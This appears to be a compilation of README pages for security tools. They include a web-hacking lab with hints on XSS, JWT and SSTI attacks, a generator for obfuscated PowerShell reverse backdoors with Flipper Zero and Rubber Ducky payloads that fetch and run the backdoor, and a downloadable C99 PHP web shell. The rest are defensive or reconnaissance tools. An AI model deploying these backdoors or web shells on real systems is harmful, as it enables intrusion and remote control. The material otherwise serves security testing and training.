The environment is based on Docker and Docker Compose, so it is necessary to have both installed.

To install Docker on Kali Linux, run the following commands:

sudo apt update -y
sudo apt install -y docker.io
sudo systemctl enable docker --now
sudo usermod -aG docker $USER

To install Docker on other Debian-based distributions, run the following commands:

curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
sudo systemctl enable docker --now
sudo usermod -aG docker $USER

It is recommended to log out and log in again so that the user is recognized as belonging to the docker group.

To install Docker Compose, run the following command:

sudo apt install -y docker-compose

Note: In case of using M1 it is recommended to execute the following command before building the images:

export DOCKER_DEFAULT_PLATFORM=linux/amd64

The next step is to clone the repository and build the Docker images:

git clone https://github.com/takito1812/web-hacking-playground.git
cd web-hacking-playground
docker-compose build

Also, it is recommended to install the Foxy Proxy browser extension, which allows you to easily change proxy settings, and Burp Suite, which we will use to intercept HTTP requests.

We will create a new profile in Foxy Proxy to use Burp Suite as a proxy. To do this, we go to the Foxy Proxy options, and add a proxy with the following configuration:

  • Proxy Type: HTTP
  • Proxy IP address: 127.0.0.1
  • Port: 8080

Deployment

Once everything you need is installed, you can deploy the environment with the following command:

git clone https://github.com/takito1812/web-hacking-playground.git
cd web-hacking-playground
docker-compose up -d

This will create two containers of applications developed in Flask on port 80:

  • The vulnerable web application (Socially): Simulates a social network.
  • The exploit server: You should not try to hack it, since it does not have any vulnerabilities. Its objective is to simulate a victim's access to a malicious link.

Important

It is necessary to add the IP of the containers to the /etc/hosts file, so that they can be accessed by name and that the exploit server can communicate with the vulnerable web application. To do this, run the following commands:

sudo sed -i '/whp-/d' /etc/hosts
echo "$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' whp-socially) whp-socially" | sudo tee -a /etc/hosts
echo "$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' whp-exploitserver) whp-exploitserver" | sudo tee -a /etc/hosts

Once this is done, the vulnerable application can be accessed from http://whp-socially and the exploit server from http://whp-exploitserver.

When using the exploit server, the above URLs must be used, using the domain name and not the IPs. This ensures correct communication between containers.

When it comes to hacking, to represent the attacker's server, the local Docker IP must be used, since the lab is not intended to make requests to external servers such as Burp Collaborator, Interactsh, etc. A Python http.server can be used to simulate a web server and receive HTTP interactions. To do this, run the following command:

sudo python3 -m http.server 80

Stages

The environment is divided into three stages, each with different vulnerabilities. It is important that they are done in order, as the vulnerabilities in the following stages build on those in the previous stages. The stages are:

  • Stage 1: Access with any user
  • Stage 2: Access as admin
  • Stage 3: Read the /flag file

Important

Below are spoilers for each stage's vulnerabilities. If you don't need help, you can skip this section. On the other hand, if you don't know where to start, or want to check if you're on the right track, you can extend the section that interests you.

Stage 1: Access with any user

Display

At this stage, a specific user's session can be stolen through Cross-Site Scripting (XSS), which allows JavaScript code to be executed. To do this, the victim must be able to access a URL in the user's context, this behavior can be simulated with the exploit server.

The hints to solve this stage are:

  • Are there any striking posts on the home page?
  • You have to chain two vulnerabilities to steal the session. XSS is achieved by exploiting an Open Redirect vulnerability, where the victim is redirected to an external URL.
  • The Open Redirect has some security restrictions. You have to find how to get around them. Analyze which strings are not allowed in the URL.
  • Cookies are not the only place where session information is stored. Reviewing the source code of the JavaScript files included in the application can help clear up doubts.

Stage 2: Access as admin

Display

At this stage, a token can be generated that allows access as admin. This is a typical JSON Web Token (JWT) attack, in which the token payload can be modified to escalate privileges.

The hint to solve this stage is that there is an endpoint that, given a JWT, returns a valid session cookie.

Stage 3: Read the /flag file

Display

At this stage, the /flag file can be read through a Server Site Template Injection (SSTI) vulnerability. To do this, you must get the application to run Python code on the server. It is possible to execute system commands on the server.

The hints to solve this stage are:

  • Vulnerable functionality is protected by two-factor authentication. Therefore, before exploiting the SSTI, a way to bypass the OTP code request must be found. There are times when the application trusts the requests that are made from the same server and the HTTP headers play an important role in this situation.

  • The SSTI is Blind, this means that the output of the code executed on the server is not obtained directly. The Python smtpd module allows you to create an SMTP server that prints messages it receives to standard output:

    sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25

  • The application uses Flask, so it can be inferred that the template engine is Jinja2 because it is recommended by the official Flask documentation and is widely used. You must get a Jinja2 compatible payload to get the final flag.

  • The email message has a character limitation. Information on how to bypass this limitation can be found on the Internet.

Solutions

Detailed solutions for each stage can be found in the Solutions folder.

Resources

The following resources may be helpful in resolving the stages:

Collaboration

Pull requests are welcome. If you find any bugs, please open an issue.



Invoke-Transfer - PowerShell Clipboard Data Transfer

Invoke-Transfer

Invoke-Transfer is a PowerShell Clipboard Data Transfer.

This tool helps you to send files in highly restricted environments such as Citrix, RDP, VNC, Guacamole.. using the clipboard function.

As long as you can send text through the clipboard, you can send files in text format, in small Base64 encoded chunks. Additionally, you can transfer files from a screenshot, using the native OCR function of Microsoft Windows.

Requirements

  • Powershell 5.1
  • Windows 10 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/Invoke-Transfer

Usage

.\Invoke-Transfer.ps1 -h

___ _ _____ __
|_ _|_ __ _ __ __ | | __ __ |_ _| __ __ _ _ __ ___ / _| ___ _ __
| || '_ \ \ / / _ \| |/ / _ \____| || '__/ _' | '_ \/ __| |_ / _ \ '__|
| || | | \ V / (_) | < __/____| || | | (_| | | | \__ \ _| __/ |
|___|_| |_|\_/ \___/|_|\_\___| |_||_| \__,_|_| |_|___/_| \___|_|

----------------------- by @JoelGMSec & @3v4Si0N ---------------------


Info: This tool helps you to send files in highly restricted environments
such as Citrix, RDP, VNC, Guacamole... using the clipboard function

Usage: .\Invoke-Transfer.ps1 -split {FILE} -sec {SECONDS}
Send 120KB chunks with a set time delay of seconds
Add -guaca to send files through Apache Guacamole

.\Invoke-Transfer.ps1 -merge {B64FILE} -out {FILE}
Merge Base64 file into original file in de sired path

.\Invoke-Transfer.ps1 -read {IMGFILE} -out {FILE}
Read screenshot with Windows OCR and save output to file

Warning: This tool only works on Windows 10 or greater
OCR reading may not be entirely accurate

The detailed guide of use can be found at the following link:

https://darkbyte.net/transfiriendo-ficheros-en-entornos-restringidos-con-invoke-transfer

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gámez Molina (@JoelGMSec) and Héctor de Armas Padrón (@3v4si0n).

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find us on Twitter as @JoelGMSec, @3v4si0n and on my blog darkbyte.net.



Email-Vulnerablity-Checker - Find Email Spoofing Vulnerablity Of Domains


Verify whether the domain is vulnerable to spoofing by Email-vulnerablity-checker

Features

  • This tool will automatically tells you if the domain is email spoofable or not
  • you can do single and multiple domain input as well (for multiple domain checker you need to have text file with domains in it)

Usage:

Clone the package by running:

git clone  https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git

Step 1. Install Requirements

Linux distribution sudo apt update sudo apt install dnsutils # Install dig for CentOS sudo yum install bind-utils # Install dig for macOS brew install dig" dir="auto">
# Update the package list and install dig for Debian-based Linux distribution 
sudo apt update
sudo apt install dnsutils

# Install dig for CentOS
sudo yum install bind-utils

# Install dig for macOS
brew install dig

Step 2. Finish The Instalation

To use the Email-Vulnerablity-Checker type the following commands in Terminal:

apt install git -y 
apt install dig -y
git clone https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git
cd Email-Vulnerablity-Checker
chmod 777 spfvuln.sh

Run email vulnerablity checker by just typing:

./spfvuln.sh -h

Support

For Queries: Telegram
Contributions, issues, and feature requests are welcome!
Give a ★ if you like this project!



DNSrecon-gui - DNSrecon Tool With GUI For Kali Linux


DNSRecon is a DNS scanning and enumeration tool written in Python, which allows you to perform different tasks, such as enumeration of standard records for a defined domain (A, NS, SOA, and MX). Top-level domain expansion for a defined domain.

With this graph-oriented user interface, the different records of a specific domain can be observed, classified and ordered in a simple way.

Install

git clone https://github.com/micro-joan/dnsrecon-gui
cd dnsrecon-gui/
chmod +x run.sh
./run.sh

After executing the application launcher you need to have all the components installed, the launcher will check one by one, and in the case of not having any component installed it will show you the statement that you must enter to install it:


Use

When the tool is ready to use the same installer will give you a URL that you must put in the browser in a private window so every time you do a search you will have to open a new window in private or clear your browser cache to refresh the graphics.

Tools

Service Functions Status
Text2MindMap Convert text to mindmap
✅Free
dnsenum DNS information gathering
✅Free

My website: https://microjoan.com
My blog: https://darkhacking.es/
Buy me a coffee: https://www.buymeacoffee.com/microjoan

DISCLAIMER

This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way.

This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!


Powershell-Backdoor-Generator - Obfuscated Powershell Reverse Backdoor With Flipper Zero And USB Rubber Ducky Payloads


Reverse backdoor written in Powershell and obfuscated with Python. Allowing the backdoor to have a new signature after every run. Also can generate auto run scripts for Flipper Zero and USB Rubber Ducky.

usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL convers ion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory

Features

  • Hak5 Rubber Ducky payload
  • Flipper Zero payload
  • Download Files from remote system
  • Fetch target computers public IP address
  • List local users
  • Find Intresting Files
  • Get OS Information
  • Get BIOS Information
  • Get Anti-Virus Status
  • Get Active TCP Clients
  • Checks for common pentesting software installed

Standard backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file in the current working directory will be created called backdoor.ps1

Bad USB/ USB Rubber Ducky attacks

When using any of these attacks you will be opening up a HTTP server hosting the backdoor. Once the backdoor is retrieved the HTTP server will be shutdown.

Payloads

  • Execute -- Execute the backdoor
  • BindAndExecute -- Place the backdoor in temp, bind the backdoor to startup and then execute it.

Flipper Zero Backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor.txt --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Place the text file you specified (e.g: powershell_backdoor.txt) into your flipper zero. When the payload is executed it will download and execute backdoor.ps1

Usb Rubber Ducky Backdoor

 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file named inject.bin will be placed in your current working directory. Java is required for this feature. When the payload is executed it will download and execute backdoor.ps1

Backdoor Execution

Tested on Windows 11, Windows 10 and Kali Linux

powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1

To Do

  • Add Standard Backdoor
  • Find Writeable Directories
  • Get Windows Update Status

Output of 5 obfuscations/Runs

sha1:c7a5fa3e56640ce48dcc3e8d972e444d9cdd2306
sha1:b32dab7b26cdf6b9548baea6f3cfe5b8f326ceda
sha1:e49ab36a7ad6b9fc195b4130164a508432f347db
sha1:ba40fa061a93cf2ac5b6f2480f6aab4979bd211b
sha1:f2e43320403fb11573178915b7e1f258e7c1b3f0


Leaktopus - Keep Your Source Code Under Control

Keep your source code under control.

Key Features

  • Plug&Play - one line installation with Docker.

  • Scan various sources containing a set of keywords, e.g. ORGANIZATION-NAME.com.

    Currently supports:

    • GitHub
      • Repositories
      • Gists (coming soon)
    • Paste sites (e.g., PasteBin) (coming soon)
  • Filter results with a built-in heuristic engine.

  • Enhance results with IOLs (Indicators Of Leak):

    • Secrets in the found sources (including Git repos commits history):
    • URIs (Including indication of your organization's domains)
    • Emails (Including indication of your organization's email addresses)
    • Contributors
    • Sensitive keywords (e.g., canary token, internal domains)
  • Allows to ignore public sources, (e.g., "junk" repositories by web crawlers).

  • OOTB ignore list of common "junk" sources.

  • Acknowledge a leak, and only get notified if the source has been modified since the previous scan.

  • Built-in ELK to search for data in leaks (including full index of Git repositories with IOLs).

  • Notify on new leaks

    • MS Teams Webhook.
    • Slack Bot.
    • Cortex XSOAR® (by Palo Alto Networks) Integration (WIP).

Technology Stack

  • Fully Dockerized.
  • API-first Python Flask backend.
  • Decoupled Vue.js (3.x) frontend.
  • SQLite DB.
  • Async tasks with Celery + Redis queues.

Prerequisites

  • Docker-Compose

Installation

  • Clone the repository
  • Create a local .env file
    cd Leaktopus
    cp .env.example .env
  • Edit .env according to your local setup (see the internal comments).
  • Run Leaktopus
    docker-compose up -d
  • Initiate the installation sequence by accessing the installation API. Just open http://{LEAKTOPUS_HOST}:8000/api/install in your browser.
  • Check that the API is up and running at http://{LEAKTOPUS_HOST}:8000/up
  • The UI should be available at http://{LEAKTOPUS_HOST}:8080

Using Github App

In addition to the basic personal access token option, Leaktopus supports Github App authentication. Using Github App is recommended due to the increased rate limits.

  1. To use Github App authentication, you need to create a Github App and install it on your organization/account. See Github's documentation for more details.

  2. After creating the app, you need to set the following environment variables:

    • GITHUB_USE_APP=True
    • GITHUB_APP_ID
    • GITHUB_INSTALLATION_ID - The installation id can be found in your app installation.
    • GITHUB_APP_PRIVATE_KEY_PATH (defaults to /app/private-key.pem)
  3. Mount the private key file to the container (see docker-compose.yml for an example). ./leaktopus_backend/private-key.pem:/app/private-key.pem

* Note that GITHUB_ACCESS_TOKEN will be ignored if GITHUB_USE_APP is set to True.

Updating Leaktopus

If you wish to update your Leaktopus version (pulling a newer version), just follow the next steps.

  • Pull the latest version.
    git pull
  • Rebuild Docker images (data won't be deleted).
    # Force image recreation
    docker-compose up --force-recreate --build
  • Run the DB update by calling its API (should be required after some updates). http://{LEAKTOPUS_HOST}/api/updatedb

Results Filtering Heuristic Engine

The built-in heuristic engine is filtering the search results to reduce false positives by:

  • Content:
    • More than X emails containing non-organizational domains.
    • More than X URIs containing non-organizational domains.
  • Metadata:
    • More than X stars.
    • More than X forks.
  • Sources ignore list.

API Documentation

OpenAPI documentation is available in http://{LEAKTOPUS_HOST}:8000/apidocs.

Leaktopus Services

Service Port Mandatory/Optional
Backend (API) 8000 Mandatory
Backend (Worker) N/A Mandatory
Redis 6379 Mandatory
Frontend 8080 Optional
Elasticsearch 9200 Optional
Logstash 5000 Optional
Kibana 5601 Optional

The above can be customized by using a custom docker-compose.yml file.

Security Notes

As for now, Leaktopus does not provide any authentication mechanism. Make sure that you are not exposing it to the world, and doing your best to restrict access to your Leaktopus instance(s).

Contributing

Contributions are very welcomed.

Please follow our contribution guidelines and documentation.



C99Shell-PHP7 - PHP 7 And Safe-Build Update Of The Popular C99 Variant Of PHP Shell


C99Shell-PHP7

PHP 7 and safe-build Update of the popular C99 variant of PHP Shell.

c99shell.php v.2.0 (PHP 7) (25.02.2019) Updated by: PinoyWH1Z for PHP 7

About C99Shell

An excellent example of a web shell is the c99 variant, which is a PHP shell (most of them calls it malware) often uploaded to a vulnerable web application to give hackers an interface. The c99 shell lets the attacker take control of the processes of the Internet server, allowing him or her give commands on the server as the account under which the threat is operating. It lets the hacker upload, browse the file system, edit and view files, in addition, to deleting, moving them and changing permissions. Finding a c99 shell is an excellent way to identify a compromise on a system. The c99 shell is about 1500 lines long if packed and 4900+ if properly displayed, and some of its traits include showing security measures the web server may use, a file viewer that has permissions, a place w here the attacker can operate custom PHP code (PHP malware c99 shell).

There are different variants of the c99 shell that are being used today. This github release is an example of a relatively recent one. It has many signatures that can be utilized to write protective countermeasures.


About this release:

I've been using php shells as part of my Ethical Hacking activities. And I have noticed that most of the php shells that are downloadable online are encrypted with malicious codes and without you knowing, others also insert trackers so they can see where you placed your php shell at.

I've came up with an idea such as "what if I get the stable version of c99shell and reverse the encrypted codes, remove the malicious codes and release it to public for good." And yeah, I decided to do it, but I noticed that most of the servers now have upgraded their apache service to PHP 7, sadly, the codes that I have is for PHP 5.3 and below.

The good thing is.. only few lines of syntax are needed to be altered, so I did it.

Here you go mates, a clean and safe-build version of the most stable c99shell that I can see.

If ever you see more bugs, please create an issue or just fork it, update it and do a pull request so I can check it and update the codes for stabilization.

PS:

This is a widely used php shell by hackers, so don't freak out if your anti-virus/anti-malware detects this php file as malicious or treated as backdoor. Since you can see the codes in my re-released project, you can read all throughout the codes and inspect or even debug as much as you like.

Disclaimer:

I will NOT be held responsible for any unethical use of this hacking tool.

Official Release:

c99shell_v2.0.zip (Zip Password: PinoyWH1Z)



Darkdump2 - Search The Deep Web Straight From Your Terminal



About Darkdump (Recent Notice - 12/27/22)

Darkdump is a simple script written in Python3.11 in which it allows users to enter a search term (query) in the command line and darkdump will pull all the deep web sites relating to that query. Darkdump2.0 is here, enjoy!

Installation

  1. git clone https://github.com/josh0xA/darkdump
  2. cd darkdump
  3. python3 -m pip install -r requirements.txt
  4. python3 darkdump.py --help

Usage

Example 1: python3 darkdump.py --query programming
Example 2: python3 darkdump.py --query="chat rooms"
Example 3: python3 darkdump.py --query hackers --amount 12

  • Note: The 'amount' argument filters the number of results outputted

Usage With Increased Anonymity

Darkdump Proxy: python3 darkdump.py --query bitcoin -p

Menu


____ _ _
| \ ___ ___| |_ _| |_ _ _____ ___
| | | .'| _| '_| . | | | | . |
|____/|__,|_| |_,_|___|___|_|_|_| _|
|_|

Developed By: Josh Schiavone
https://github.com/josh0xA
joshschiavone.com
Version 2.0

usage: darkdump.py [-h] [-v] [-q QUERY] [-a AMOUNT] [-p]

options:
-h, --help show this help message and exit
-v, --version returns darkdump's version
-q QUERY, --query QUERY
the keyword or string you want to search on the deepweb
-a AMOUNT, --amount AMOUNT
the amount of results you want to retrieve (default: 10)
-p, --proxy use darkdump proxy to increase anonymity

Visual

Ethical Notice

The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Do not use darkdump to navigate websites that take part in any activity that is identified as illegal under the laws and regulations of your government. May God bless you all.

License

MIT License
Copyright (c) Josh Schiavone



Heap_Detective - The Simple Way To Detect Heap Memory Pitfalls In C++ And C


This tool uses the taint analysis technique for static analysis and aims to identify points of heap memory usage vulnerabilities in C and C++ languages. The tool uses a common approach in the first phase of static analysis, using tokenization to collect information.

The second phase has a different approach to common lessons of the legendary dragon book, yes the tool doesn't use AST or resources like LLVM following parsers' and standard tips. The approach present aims to study other ways to detect vulnerabilities, using custom vector structures and typical recursive traversal with ranking following taint point. So the result of the sum of these techniques is the Heap_detective.

The tool follows the KISS principle "Keep it simple, stupid!". There's more than one way to do a SAST tool, I know that. Yes, I thought to use graph database or AST, but this action cracked the KISS principle in the context of this project.

https://antonio-cooler.gitbook.io/coolervoid-tavern/detecting-heap-memory-pitfalls


Features

  • C and C++ tokenizer
  • List of heap static routes for each source with taint points for analysis
  • Analyser to detect double free vulnerability
  • Analyser to detect use after free vulnerability
  • Analyser to detect memory leak

To test, read the directory samplers to understand the context, so to run look that following:

$ git clone https://github.com/CoolerVoid/heap_detective

$ cd heap_detective

$ make
// to run
$ bin/heap_detective samplers/
note:
So don't try "$ cd bin; ./heap_detective"
first argv is a directory for recursive analysis

Note: tested in GCC 9 and 11

The first argument by command is a directory for recursive analysis. You can study bad practices in directory "samplers".

Future features

  • Analyser to detect off-by-one vulnerability
  • Analyser to detect wild pointer
  • Analyser to detect heap overflow vulnerability

Overview

Output example:




Collect action done

...::: Heap static route :::...
File path: samplers/example3.c
Func name: main
Var name: new
line: 10: array = new obj[100];
Sinks:
line: 10: array = new obj[100];
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example3.c
Func name: while
Var name: array
line: 27: array = malloc(1);
Sinks:
line: 27: array = malloc(1);
Taint: True
In Loop: false
line: 28: array=2;
Taint: false
In Loop: false
line: 30: array = malloc(3);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example5.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 11: free(ch_ptr);
Taint: True
In Loop: false< br/> line: 12: free(ch_ptr);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example1.c
Func name: main
Var name: buf1R1
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
Sinks:
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
Taint: True
In Loop: false
line: 26: free(buf1R1);
Taint: True
In Loop: false
line: 30: if (buf1R1) {
Taint: false
In Loop: false
line: 31: free(buf1R1);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example2.c
Func name: main
Var name: ch_ptr
line: 7: ch_ptr=malloc(100);
Sinks:
line: 7: ch_ptr=malloc(100);
Taint: True
In Loop: false
line: 11: ch_ptr = 'A';
Taint: false
In Loop: True
line: 12: free(ch_ptr);
Taint: True
In Loop: True
line: 13: printf("%s\n", ch_pt r);
Taint: false
In Loop: True

...::: Heap static route :::...
File path: samplers/example4.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 13: ch_ptr = 'A';
Taint: false
In Loop: false
line: 14: free(ch_ptr);
Taint: True
In Loop: false
line: 15: printf("%s\n", ch_ptr);
Taint: false
In Loop: false

...::: Heap static route :::...
File path: samplers/example6.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 11: free(ch_ptr);
Taint: True
In Loop: false
line: 13: ch_ptr = malloc(500);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example7.c
Fu nc name: special
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 15: free(ch_ptr);
Taint: True
In Loop: false
line: 16: ch_ptr = malloc(500);
Taint: True
In Loop: false
line: 17: ch_ptr=NULL;
Taint: false
In Loop: false
line: 25: char *ch_ptr = NULL;
Taint: false
In Loop: false

...::: Heap static route :::...
File path: samplers/example7.c
Func name: main
Var name: ch_ptr
line: 27: ch_ptr = malloc(100);
Sinks:
line: 27: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 30: free(ch_ptr);
Taint: True
In Loop: false
line: 32: ch_ptr = malloc(500);
Taint: True
In Loop: false

>>-----> Memory leak analyser

...::: Memory leak analyser :::...
File path: samplers/example3.c
F unction name: main
memory leak found!
line: 10: array = new obj[100];

...::: Memory leak analyser :::...
File path: samplers/example3.c
Function name: while
memory leak found!
line: 27: array = malloc(1);
line: 28: array=2;
line: 30: array = malloc(3);

...::: Memory leak analyser :::...
File path: samplers/example5.c
Function name: main
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Memory leak analyser :::...
File path: samplers/example1.c
Function name: main
memory leak found!
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Memory leak analyser :::...
File path: samplers/example2.c
Function name: main
memory leak found!
Maybe the function to liberate memory can be in a loo p context!
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

...::: Memory leak analyser :::...
File path: samplers/example6.c
Function name: main
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 13: ch_ptr = malloc(500);

...::: Memory leak analyser :::...
File path: samplers/example7.c
Function name: special
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 15: free(ch_ptr);
line: 16: ch_ptr = malloc(500);
line: 17: ch_ptr=NULL;
line: 25: char *ch_ptr = NULL;

...::: Memory leak analyser :::...
File path: samplers/example7.c
Function name: main
memory leak found!
line: 27: ch_ptr = malloc(100);
line: 30: free(ch_ptr);
line: 32: ch_ptr = malloc(500);

>>-----> Start double free analyser

...::: Double free analys er :::...
File path: samplers/example5.c
Function name: main
Double free found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Double free analyser :::...
File path: samplers/example1.c
Function name: main
Double free found!
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Double free analyser :::...
File path: samplers/example2.c
Function name: main
Double free found!
Maybe the function to liberate memory can be in a loop context!
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

>>-----> Start use after free analyser

...::: Use after free analyser :::...
File path: samplers/example5.c
Function name: main
Use after free found
l ine: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example1.c
Function name: main
Use after free found
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Use after free analyser :::...
File path: samplers/example2.c
Function name: main
Use after free found
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example4.c
Function name: main
Use after free found
line: 8: ch_ptr = malloc(100);
line: 13: ch_ptr = 'A';
line: 14: free(ch_ptr);
line: 15: printf("%s\n", ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example6.c
Function name: main
Use after free found
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 13: ch_ptr = malloc(500);

...::: Use after free analyser :::...
File path: samplers/example7.c
Function name: special
Use after free found
line: 8: ch_ptr = malloc(100);
line: 15: free(ch_ptr);
line: 16: ch_ptr = malloc(500);
line: 17: ch_ptr=NULL;
line: 25: char *ch_ptr = NULL;

...::: Use after free analyser :::...
File path: samplers/example7.c
Function name: main
Use after free found
line: 27: ch_ptr = malloc(100);
line: 30: free(ch_ptr);
line: 32: ch_ptr = malloc(500);






Winevt_Logs_Analysis - Searching .Evtx Logs For Remote Connections


Simple script for the purpose of finding remote connections to Windows machine and ideally some public IPs. It checks for some EventIDs regarding remote logins and sessions.

You should pip install -r requirements.txt so the script can work and parse some of the .evtx files inside winevt folder.


The winevt/Logs folders and the script must have identical file path.

Execution Example

Result Example



EAST - Extensible Azure Security Tool - Documentation


Extensible Azure Security Tool (Later referred as E.A.S.T) is tool for assessing Azure and to some extent Azure AD security controls. Primary use case of EAST is Security data collection for evaluation in Azure Assessments. This information (JSON content) can then be used in various reporting tools, which we use to further correlate and investigate the data.


This tool is licensed under MIT license.




Collaborators

Release notes

  • Preview branch introduced

    Changes:

    • Installation now accounts for use of Azure Cloud Shell's updated version in regards to depedencies (Cloud Shell has now Node.JS v 16 version installed)

    • Checking of Databricks cluster types as per advisory

      • Audits Databricks clusters for potential privilege elevation - This control requires typically permissions on the databricks cluster"
    • Content.json is has now key and content based sorting. This enables doing delta checks with git diff HEAD^1 ¹ as content.json has predetermined order of results

    ¹Word of caution, if want to check deltas of content.json, then content.json will need to be "unignored" from .gitignore exposing results to any upstream you might have configured.

    Use this feature with caution, and ensure you don't have public upstream set for the branch you are using this feature for

  • Change of programming patterns to avoid possible race conditions with larger datasets. This is mostly changes of using var to let in for await -style loops


Important

Current status of the tool is beta
  • Fixes, updates etc. are done on "Best effort" basis, with no guarantee of time, or quality of the possible fix applied
  • We do some additional tuning before using EAST in our daily work, such as apply various run and environment restrictions, besides formalizing ourselves with the environment in question. Thus we currently recommend, that EAST is run in only in test environments, and with read-only permissions.
    • All the calls in the service are largely to Azure Cloud IP's, so it should work well in hardened environments where outbound IP restrictions are applied. This reduces the risk of this tool containing malicious packages which could "phone home" without also having C2 in Azure.
      • Essentially running it in read-only mode, reduces a lot of the risk associated with possibly compromised NPM packages (Google compromised NPM)
      • Bugs etc: You can protect your environment against certain mistakes in this code by running the tool with reader-only permissions
  • Lot of the code is "AS IS": Meaning, it's been serving only the purpose of creating certain result; Lot of cleaning up and modularizing remains to be finished
  • There are no tests at the moment, apart from certain manual checks, that are run after changes to main.js and various more advanced controls.
  • The control descriptions at this stage are not the final product, so giving feedback on them, while appreciated, is not the focus of the tooling at this stage
  • As the name implies, we use it as tool to evaluate environments. It is not meant to be run as unmonitored for the time being, and should not be run in any internet exposed service that accepts incoming connections.
  • Documentation could be described as incomplete for the time being
  • EAST is mostly focused on PaaS resource, as most of our Azure assessments focus on this resource type
